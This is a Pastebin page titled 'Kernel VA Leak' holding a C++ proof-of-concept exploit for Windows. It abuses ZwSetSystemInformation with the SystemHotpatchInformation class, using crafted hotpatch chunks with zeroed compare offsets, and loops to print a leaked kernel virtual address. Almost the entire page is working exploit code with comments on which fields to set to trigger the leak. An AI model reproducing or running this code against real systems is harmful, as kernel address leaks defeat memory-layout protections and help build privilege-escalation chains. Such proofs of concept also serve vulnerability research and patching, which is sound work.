waliedassar

Kernel VA Leak

Apr 18th, 2013
407
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. //http://waleedassar.blogspot.com
  2.  
  3.  
  4. #include "stdafx.h"
  5. #include "windows.h"
  6. #include "stdio.h"
  7.  
  8. #define SystemHotpatchInformation    0x45
  9.  
  10. extern "C"
  11. {
  12.     int __stdcall ZwSetSystemInformation(unsigned long,void*,unsigned long);
  13. }
  14.  
  15.  
  16. struct LARGE_INTEGER_
  17. {
  18.     unsigned long Low;
  19.     unsigned long High;
  20. };
  21.  
  22. struct _HOTPATCH_CHUNK
  23. {
  24.     LARGE_INTEGER_ Address; //To be Probed, Locked, mapped, etc
  25.     LARGE_INTEGER_ SourceAddress; //receives mapped address, system-wide kernel virtual address
  26.  
  27.     unsigned long SecondCompareOffset; // Set it to Zero to leak
  28.     unsigned long ByteCount;
  29.     unsigned long SecondCompareOffset_x;//Set it to Zero to leak
  30.     unsigned long CompareOffset;//Set it to Zero to leak
  31.     unsigned long CompareSize;
  32.     unsigned long Pad4;
  33. };
  34.  
  35. struct _HOTPATCH_INFO
  36. {  
  37.     unsigned long Flags;
  38.         unsigned long Size;
  39.         unsigned long NumberOfChunks;
  40.         unsigned long pad0;
  41.     _HOTPATCH_CHUNK Chunk[1];//You can increase it
  42. };
  43.  
  44. void* pNops;
  45. _HOTPATCH_INFO* pInput;
  46.  
  47. void Alloc(unsigned long TotalSize)
  48. {
  49.     pNops=VirtualAlloc(0,0x1000,MEM_RESERVE|MEM_COMMIT,PAGE_READWRITE);
  50.    
  51.     //---------------------------
  52.     pInput=(_HOTPATCH_INFO*)VirtualAlloc(0,TotalSize,MEM_RESERVE|MEM_COMMIT,PAGE_READWRITE);
  53.    
  54. }
  55.  
  56.  
  57. void main()
  58. {
  59.        
  60.        
  61.    unsigned long NumberOfChunks=0x650;
  62.    unsigned long TotalSize = ((NumberOfChunks+1)*sizeof(_HOTPATCH_CHUNK))+0x10;
  63.    printf("Total Size is %x\r\n",TotalSize);
  64.    Alloc(TotalSize);
  65.  
  66.    while(1)
  67.    {       
  68.         memset(pNops,0x90,0x1000);
  69.         memset(pInput,0,TotalSize);
  70.         pInput->Flags=0;
  71.         pInput->Size=TotalSize;
  72.         pInput->NumberOfChunks=NumberOfChunks+1;
  73.         unsigned long i=0;
  74.         for(i=0;i<NumberOfChunks;i++)
  75.         {
  76.              pInput->Chunk[i].Address.Low=(unsigned long)pNops;
  77.              pInput->Chunk[i].ByteCount=0x1000;
  78.         }
  79.         pInput->Chunk[i].Address.Low=(unsigned long)pNops; //(unsigned long)0x7FFE0000;
  80.         pInput->Chunk[i].ByteCount=0x1000;
  81.         int ret=ZwSetSystemInformation(SystemHotpatchInformation,pInput,TotalSize);
  82.         printf("Return value is %x\r\n",ret);
  83.         if(ret==0)
  84.         {
  85.             printf("Leaked address is %p`%p\r\n",*(unsigned long*)((unsigned long)pNops+0x001C),*(unsigned long*)((unsigned long)pNops+0x018) );
  86.         }
  87.    }
  88.    return;
  89. }
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×